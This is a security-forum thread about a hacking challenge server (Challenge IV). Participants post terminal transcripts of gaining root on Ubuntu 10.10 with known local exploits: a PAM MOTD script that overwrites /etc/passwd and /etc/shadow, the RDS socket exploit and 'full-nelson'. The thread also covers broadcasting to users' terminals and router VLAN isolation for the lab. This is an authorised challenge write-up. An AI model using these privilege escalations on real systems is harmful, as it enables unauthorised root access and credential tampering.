rcdk1 wrote: » Would PM not be more appropriate rather than asking people to disclose their private email addresses? (given that this is the security forum ) having said that, I'm not knocking what you've done and would be interested in having a look.
echo "message" | wall
echo "message" > /dev/pts/?
tput bel | tee `who | awk '{printf "/dev/"$2" "}'`
Sigtran peann rockethamster 900913 Pygmalion
login as: damodamo@damo-challenge4.dyndns.biz's password: Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux Ubuntu 10.10 Welcome to Challenge IV. Due to the nature of this challenge, there is lots of potential for abuse. You are free to play around with the server, once you do not prevent other users from attempting the challenge. Challenge IV Hall of Fame: Sigtran peann rockethamster 900913 Pygmalion damo@challenge4server:~$
damo@challenge4server:~$ uname -a Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux damo@challenge4server:~$
damo@challenge4server:~$ ./pam_motd.sh [%] Ubuntu PAM MOTD local root [%] SSH key set up [%] Backuped /home/damo/.cache [%] spawn ssh [+] owned: /etc/passwd [%] spawn ssh [+] owned: /etc/shadow [%] Restored /home/damo/.cache [%] SSH key removed [+] Success! Use password toor to get root Password: root@challenge4server:/home/damo# id uid=0(root) gid=0(root) groups=0(root) root@challenge4server:/home/damo# whoami root root@challenge4server:/home/damo#
damo@challenge4server:~$ ./local-rds.c [%] Linux kernel >= 2.6.30 RDS socket exploit [%] by Dan Rosenberg [%] Resolving kernel addresses... [+] Resolved security_ops to 0xc09ddc0c [+] Resolved default_security_ops to 0xc08137a0 [+] Resolved cap_ptrace_traceme to 0xc030c580 [+] Resolved commit_creds to 0xc0174b20 [+] Resolved prepare_kernel_cred to 0xc0174f70 [%] Overwriting security ops... [%] Overwriting function pointer... [%] Triggering payload... [%] Restoring function pointer... [%] Got root! # id uid=0(root) gid=0(root) groups=0(root) # whoami root #
damo@challenge4server:~$ ./full-nelson [%] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xe0a882a0 [+] Resolved econet_ops to 0xe0a883a0 [+] Resolved commit_creds to 0xc0174b20 [+] Resolved prepare_kernel_cred to 0xc0174f70 [%] Calculating target... [%] Failed to set Econet address. [%] Triggering payload... [%] Got root! # id uid=0(root) gid=0(root) groups=0(root) # whoami root #
# bash root@challenge4server:/# cd / root@challenge4server:/# ./UPDATE_HALL_OF_FAME.sh Usage: ./UPDATE_HALL_OF_FAME.sh <name> Adds a user name to the Challenge IV Hall of Fame. root@challenge4server:/# ./UPDATE_HALL_OF_FAME.sh damo damo added to the Hall of Fame. Congratulations. root@challenge4server:/#
login as: damodamo@damo-challenge4.dyndns.biz's password: Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux Ubuntu 10.10 Welcome to Challenge IV. Due to the nature of this challenge, there is lots of potential for abuse. You are free to play around with the server, once you do not prevent other users from attempting the challenge. Challenge IV Hall of Fame: Sigtran peann rockethamster 900913 Pygmalion damo damo@challenge4server:~$
Enable first VLAN. Name: vcc Type: By Port Admin Restricted: no Portname: vcc1 Ip Interface: ip-vcc1 Inter VLAN Group: Group A & B Enable second VLAN. Name: normal Type: By Port Admin Restricted: no Portname: all interfaces for normal use e.g. eth0.1, eth0.2, ssid1 Ip Interface: ip-eth-a Inter VLAN Group: Group A Enable third VLAN. Name: restricted Type: By Port Admin Restricted: yes (blocks accessing router settings) Portname: interface for the challenge server (for me ssid2) Ip Interface: ip-eth-a Inter VLAN Group: Group B
900913 wrote: » I'd love to know what the other part was as I normally don't try root servers any more, I'm happy getting mysql root.
dlofnep wrote: » Also, when I originally logged in - I had read access to other user's directories including read access to their .bash_history. Could have given the competition away for many people had anyone had rooted it at that point.